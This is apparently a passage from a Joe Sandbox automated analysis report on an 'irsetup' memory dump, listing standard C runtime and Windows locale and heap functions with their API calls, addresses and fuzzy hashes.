Instruction Fuzzy Hash: 21512432B1474D45FBFB8A3898557EE2390679C7D4F34C225BA5A866C2DF38C6198B00

Function 0000000180037058 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,?,00000000,00000001800378EC,?,?,?,?,00000000,0000000180028F80), ref: 00000001800370B3
GetLocaleInfoA.KERNEL32(?,?,?,?,00000000,00000001800378EC,?,?,?,?,00000000,0000000180028F80), ref: 00000001800370F5
GetACP.KERNEL32(?,?,?,?,00000000,00000001800378EC,?,?,?,?,00000000,0000000180028F80), ref: 0000000180037118

Strings

OCP, xrefs: 0000000180037091
ACP, xrefs: 0000000180037081

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 285159c17e2accfc9b13dbfaf6de1df71dd8840a5528aefbbd73939a99c6a5a6
Instruction ID: 31aaffd01f1e8c00c037cc1d3137d0b0bd3712a38feaaca81b6232ad461d006d
Opcode Fuzzy Hash: 285159c17e2accfc9b13dbfaf6de1df71dd8840a5528aefbbd73939a99c6a5a6
Instruction Fuzzy Hash: 22214271300A49D5FAB7DB21E9803EB6390B74C7C8F46C521AA4D47666EF28C74DC700

Function 0000000180026EEC Relevance: 7.7, APIs: 5, Instructions: 233COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000000180026F0F

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 0000000180026F52
__tzset.LIBCMT ref: 0000000180026F6F
_isindst.LIBCMT ref: 0000000180027018

Part of subcall function 0000000180026BD4: _errno.LIBCMT ref: 0000000180026BF6

_isindst.LIBCMT ref: 000000018002706C

Part of subcall function 00000001800351E8: _lock.LIBCMT ref: 00000001800351F6

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_isindst$DecodePointer__tzset_lock
String ID:
API String ID: 2552603377-0
Opcode ID: 94332f3981986e09bb0910da463cacfcd71f2233cd8271649ea0427451d2a9fc
Instruction ID: a068425ec057d83c032eccabfb2bcb394e40b10ab35c283d6b764921ba1d8b95
Opcode Fuzzy Hash: 94332f3981986e09bb0910da463cacfcd71f2233cd8271649ea0427451d2a9fc
Instruction Fuzzy Hash: B691F9B271074947EF9BDF29D55179A6792E7987C5F04C03AFA098A796EF38C6088B00

Function 00000001800223CC Relevance: 7.6, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800223FE

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 0000000180022436

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID:
API String ID: 2310398763-0
Opcode ID: 9d55c2a6a59a82965daf0e8e646d10d15f0e768c763823f1f9afd29687c29db6
Instruction ID: f5c319ab33e0a8075ae33812c2a92c3b1c48c1f7b9d2e96434c6b2da3a56c658
Opcode Fuzzy Hash: 9d55c2a6a59a82965daf0e8e646d10d15f0e768c763823f1f9afd29687c29db6
Instruction Fuzzy Hash: D641F472A00A5892F7B7DF65E8017AE3390A7897E4F60C312BA7547AC5CE78C6498B40

Function 000000018001EBFC Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018001EC2B

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 000000018001EC5E

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID:
API String ID: 2310398763-0
Opcode ID: 56bfbcb23a128c196e49c81069df4a7ee18435d57266e18776e5003e9f0183c1
Instruction ID: 904b913cc3ec980953253aa1da5105bbdd00c7158b6d19c9bc06cc26936a1786
Opcode Fuzzy Hash: 56bfbcb23a128c196e49c81069df4a7ee18435d57266e18776e5003e9f0183c1
Instruction Fuzzy Hash: EF319372714BD985FBA7AB71AC0279E6291B78D7C0F10C526BA4A87B85DF3CC6098701

Function 0000000180021B88 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000000180021BBA

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 0000000180021BED

Strings

@, xrefs: 0000000180021C1D

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID: @
API String ID: 2310398763-2766056989
Opcode ID: e305e226cf207c6d3f1dd86a634ac54eddaa51f416a3df2b113854f6797ccea9
Instruction ID: dd94d8077e03ae22ffc14675778569cb5697c2bb140d0af9ff915d2123f11729
Opcode Fuzzy Hash: e305e226cf207c6d3f1dd86a634ac54eddaa51f416a3df2b113854f6797ccea9
Instruction Fuzzy Hash: 06412C72710A4D45FBA7CB36AC513FA635167A97E8F74C216BE29876D5DF38C2098300

Function 00000001800372F8 Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 000000018003731F
GetLocaleInfoA.KERNEL32 ref: 0000000180037354
GetLocaleInfoA.KERNEL32 ref: 00000001800373AC
GetLocaleInfoA.KERNEL32 ref: 00000001800374A0

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: InfoLocale$_getptd
String ID:
API String ID: 1743167714-0
Opcode ID: b4030c375111dc87c7a81313f96055d9207103059a3c94d77078ed0d4a0bec02
Instruction ID: 9853df9228a634b84d650e4cd0a57f6a8145f4ab692f0d1b0a1c4647dd7ef205
Opcode Fuzzy Hash: b4030c375111dc87c7a81313f96055d9207103059a3c94d77078ed0d4a0bec02
Instruction Fuzzy Hash: 5F614E72300A8897DBBF9A65D9443DE73A1F38C789F51811AE75D87791CF38E6688700

Function 0000000180010AB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000000180010AD2
FormatMessageA.KERNEL32 ref: 0000000180010B02

Strings

system error %d, xrefs: 0000000180010B1B

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID: system error %d
API String ID: 3479602957-1688351658
Opcode ID: 0b669dc38d1b02e4621c60ae251cc2d9fe0382d15873282476e5f311bfdc800a
Instruction ID: 5165d0e7630ab715d2080139ec972a0a1eb7dfbc78c08bfca532b6b1035b4b33
Opcode Fuzzy Hash: 0b669dc38d1b02e4621c60ae251cc2d9fe0382d15873282476e5f311bfdc800a
Instruction Fuzzy Hash: 56011A31304A8882E7B29B55F49179AB2A0FB8D7C4F558125AA8907755DF79C6488B40

Function 000000018003758C Relevance: 3.1, APIs: 2, Instructions: 64COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00000001800375AE
GetLocaleInfoA.KERNEL32 ref: 00000001800375E3

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: InfoLocale_getptd
String ID:
API String ID: 3731964398-0
Opcode ID: ed92aab74e24e1c157c9003b9606fb17f54fc7dbdfdefb113adb3dab755d3dc2
Instruction ID: 14398583cd06948a384385bef8cd944388f3e303429900c163158203f3a44866
Opcode Fuzzy Hash: ed92aab74e24e1c157c9003b9606fb17f54fc7dbdfdefb113adb3dab755d3dc2
Instruction Fuzzy Hash: 87218032300A8896EBBB9B25D9553DBB3A0F78C789F418125E75D87396DF38D668C700

Function 000000018003715C Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 0000000180037183
GetLocaleInfoA.KERNEL32 ref: 00000001800371B8

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: InfoLocale_getptd
String ID:
API String ID: 3731964398-0
Opcode ID: 3c3da7c936a9a1d7d7928e9dc572b502ff7468b01418821e0a10ab2f620c66c2
Instruction ID: a232d29d29e465a5efbbe9cce7ee2381c15c0905e4f694560ebf159723a5cdbb
Opcode Fuzzy Hash: 3c3da7c936a9a1d7d7928e9dc572b502ff7468b01418821e0a10ab2f620c66c2
Instruction Fuzzy Hash: A9219D32300A8896EB6BDB64E8853DA73A0F38CB88F458126EA5D87755CF38D659C740

Function 0000000180037244 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 0000000180037285

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 6db5ba4383936ebe8e135fc20a07d54cabfd9c019b671f35b81fbb6f7a59b079
Instruction ID: 1779db9e300c3f0be7c9e9f2cf91417e77d66518fa8146c6749ef4c91204d209
Opcode Fuzzy Hash: 6db5ba4383936ebe8e135fc20a07d54cabfd9c019b671f35b81fbb6f7a59b079
Instruction Fuzzy Hash: D911543231468D89EBB35765E4903EB6390A39D7CCF558532FA8D46286CE28C64E8710

Function 000000018003769C Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32(?,?,00000140,000000018003786E,?,?,?,?,00000000,0000000180028F80), ref: 00000001800376EC

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: a772892202ddaf5bc622bbe73f4b19016f8f684e91aec17a0921c547e3cf381a
Instruction ID: f37fcbef81f8ea48d901cc4db84f161ea8b218e8b27c5afce3cbb95621750e1d
Opcode Fuzzy Hash: a772892202ddaf5bc622bbe73f4b19016f8f684e91aec17a0921c547e3cf381a
Instruction Fuzzy Hash: B8115E767046088BFBAB9B31C4563EB23A1F358B8DF158815E60D46287CB78C6A98781

Function 0000000180037730 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32(?,?,00000140,0000000180037836,?,?,?,?,00000000,0000000180028F80), ref: 0000000180037765

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 00904e545afd1d8bcc4d25644970bc411eaa74f4fe036e873c08ffc18f5239ee
Instruction ID: 536939a62cb50f1254b4d1823daa1212530eac2b623dc0f81497a316b2726411
Opcode Fuzzy Hash: 00904e545afd1d8bcc4d25644970bc411eaa74f4fe036e873c08ffc18f5239ee
Instruction Fuzzy Hash: CAF0AF76704A4C8AF7AB8B31C4563EB27D1A398B88F19C015EA0D422D7DE78C6998741

Function 000000018003A528 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

Part of subcall function 000000018001F6B0: _getptd.LIBCMT ref: 000000018001F6C6

GetLocaleInfoW.KERNEL32 ref: 000000018003A558

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: InfoLocale_getptd
String ID:
API String ID: 3731964398-0
Opcode ID: 30b74f351a9049185b5c7b206bcb158cb25f0595aff4ca38198320f560619d19
Instruction ID: e8c26664117332e88b1dd3b4d098a9168b36064e77387e33d55b75928aa8ea7e
Opcode Fuzzy Hash: 30b74f351a9049185b5c7b206bcb158cb25f0595aff4ca38198320f560619d19
Instruction Fuzzy Hash: AAF05432614A8482D7518B15E44439AA760F7C8BE0F588210FB9D57B69CE28C9568B40

Function 000000018003D408 Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 000000018003D430

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: ff4c1dfb36b85c262c150c417b3b8a7bb35bc48b0e0c663feccef2f2a2400bd6
Instruction ID: 54e8e65f8259819ee4ef56e8d4dbd3fa1e1d9d900539162f45c44271054f6398
Opcode Fuzzy Hash: ff4c1dfb36b85c262c150c417b3b8a7bb35bc48b0e0c663feccef2f2a2400bd6
Instruction Fuzzy Hash: 3CE06575218A8881F773D710E8013DB3750B79D7D8F814207F58C466A5DE3CC3598B00

Function 0000000180036164 Relevance: 53.8, APIs: 43, Instructions: 94COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 0000000180036179

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

free.LIBCMT ref: 0000000180036182
free.LIBCMT ref: 000000018003618B
free.LIBCMT ref: 0000000180036194
free.LIBCMT ref: 000000018003619D
free.LIBCMT ref: 00000001800361A6
free.LIBCMT ref: 00000001800361AE
free.LIBCMT ref: 00000001800361B7
free.LIBCMT ref: 00000001800361C0
free.LIBCMT ref: 00000001800361C9
free.LIBCMT ref: 00000001800361D2
free.LIBCMT ref: 00000001800361DB
free.LIBCMT ref: 00000001800361E4
free.LIBCMT ref: 00000001800361ED
free.LIBCMT ref: 00000001800361F6
free.LIBCMT ref: 00000001800361FF
free.LIBCMT ref: 000000018003620B
free.LIBCMT ref: 0000000180036217
free.LIBCMT ref: 0000000180036223
free.LIBCMT ref: 000000018003622F
free.LIBCMT ref: 000000018003623B
free.LIBCMT ref: 0000000180036247
free.LIBCMT ref: 0000000180036253
free.LIBCMT ref: 000000018003625F
free.LIBCMT ref: 000000018003626B
free.LIBCMT ref: 0000000180036277
free.LIBCMT ref: 0000000180036283
free.LIBCMT ref: 000000018003628F
free.LIBCMT ref: 000000018003629B
free.LIBCMT ref: 00000001800362A7
free.LIBCMT ref: 00000001800362B3
free.LIBCMT ref: 00000001800362BF
free.LIBCMT ref: 00000001800362CB
free.LIBCMT ref: 00000001800362D7
free.LIBCMT ref: 00000001800362E3
free.LIBCMT ref: 00000001800362EF
free.LIBCMT ref: 00000001800362FB
free.LIBCMT ref: 0000000180036307
free.LIBCMT ref: 0000000180036313
free.LIBCMT ref: 000000018003631F
free.LIBCMT ref: 000000018003632B
free.LIBCMT ref: 0000000180036337
free.LIBCMT ref: 0000000180036343

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$ErrorFreeHeapLast_errno
String ID:
API String ID: 1012874770-0
Opcode ID: 2f2d5588e97d756e9a577e36f27ed1f0fafce1ce69f8890a1f8447804ed0654a
Instruction ID: 03925525cb8416a551a9b4b4029cb5bf65b7929adb151452348da2fa71f7cf51
Opcode Fuzzy Hash: 2f2d5588e97d756e9a577e36f27ed1f0fafce1ce69f8890a1f8447804ed0654a
Instruction Fuzzy Hash: 7F416532611E4881EBA6AB75C4513FC2321ABC8BC4F048132F95D9B7A7CE10CB598354

Function 000000018003A1F8 Relevance: 36.9, APIs: 15, Strings: 6, Instructions: 130libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A235
GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A251
GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A279
EncodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A282
GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A298
EncodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2A1
GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2B7
EncodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2C0
GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2DE
EncodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2E7
DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A319
DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A328
DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A380
DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A3A0
DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A3B9

Strings

USER32.DLL, xrefs: 000000018003A22E
MessageBoxA, xrefs: 000000018003A247
GetProcessWindowStation, xrefs: 000000018003A2D4
GetUserObjectInformationA, xrefs: 000000018003A2A6
GetLastActivePopup, xrefs: 000000018003A287
GetActiveWindow, xrefs: 000000018003A268

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: Pointer$AddressDecodeProc$Encode$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
API String ID: 3085332118-232180764
Opcode ID: 8f431ba8dc0e35966c13d23202dae3974de4cf8e8649169e699a89669a8de12d
Instruction ID: dfefc03f7fba11b39094b96e9353418926974b70fd291aca694570e016384653
Opcode Fuzzy Hash: 8f431ba8dc0e35966c13d23202dae3974de4cf8e8649169e699a89669a8de12d
Instruction Fuzzy Hash: 6E513E31606B0880FDE7DB56BC957EA23906B4EBC4F4A8425BD4D037A2EE78C74D8354

Function 000000018002B1B8 Relevance: 30.5, APIs: 20, Instructions: 485COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 000000018002B1EB
_errno.LIBCMT ref: 000000018002B1F4
__doserrno.LIBCMT ref: 000000018002B24E
_errno.LIBCMT ref: 000000018002B255

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 83bcc1b7ed02ac48ed80f5db585f6cc6e072ce756355eb0b1e4c509f4418eeb5
Instruction ID: 55b8966ed909c531b91f61cb8372e423ff6e17214bc975dbaad7cba1e7de9a49
Opcode Fuzzy Hash: 83bcc1b7ed02ac48ed80f5db585f6cc6e072ce756355eb0b1e4c509f4418eeb5
Instruction Fuzzy Hash: BF22F472204AC882E7E39B55E4843ED2B91F3897D4F98C516FA5A877D2DE38C64DC302

Function 000000018002CB8C Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 211COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018002CBDD
_wsopen_s.LIBCMT ref: 000000018002CE0B

Strings

, xrefs: 000000018002CD61
ccs, xrefs: 000000018002CD3B
r, xrefs: 000000018002CBD3
, xrefs: 000000018002CD72
, xrefs: 000000018002CD36
, xrefs: 000000018002CBC9
w, xrefs: 000000018002CBD8
